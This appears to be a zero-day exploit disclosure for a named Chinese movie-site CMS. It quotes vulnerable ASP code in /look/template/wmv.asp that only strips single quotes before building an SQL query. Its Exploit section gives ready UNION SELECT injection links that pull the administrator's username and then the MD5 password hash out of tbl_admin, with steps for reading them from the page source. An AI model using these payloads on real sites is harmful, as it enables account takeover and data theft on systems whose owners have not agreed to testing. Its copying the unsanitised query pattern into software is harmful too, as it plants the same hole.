睛天电影系统 Sql Injection Vulnerability 0day

Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp
 

Code:
<%
IF Not ChkPost() Then
    response.Redirect G_error_page_1
    response.End()
End IF
id=replace(request("url"),"'","")   //仅过滤单引号
set rs=conn.execute("select top 1 url,id from qingtiandy_movieurl_tudou where id="&id)   //带入sql

IF rs.Eof Then
    response.Redirect G_error_page_1
    response.End()
Else
    url=rs(0)
End IF
%>

<object classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" name="wmp" width="508" height="415" align="middle" id="wmp">
<param name="url" value="<%=url%>">   //显示url
<param name="stretchToFit" value="0">
<param name="PlayCount" value="1">
<param name="volume" value="100">
<param name="mute" value="0">
<param name="windowlessVideo" value="0">
<param name="fullScreen" value="0">
</object>

<script language=javascript>
function wmpfull()
{

   wmp.fullscreen = "1";
}

document.ondblclick=wmpfull
</script>

Exploit:

javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_username,2 from tbl_admin'>科幻片</a> ");

访问打印出来的链接，查看源代码找到<param name="url" value="后面就是管理员用户名

查看管理员MD5为：
javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_pass,2 from tbl_admin'>科幻片</a> ");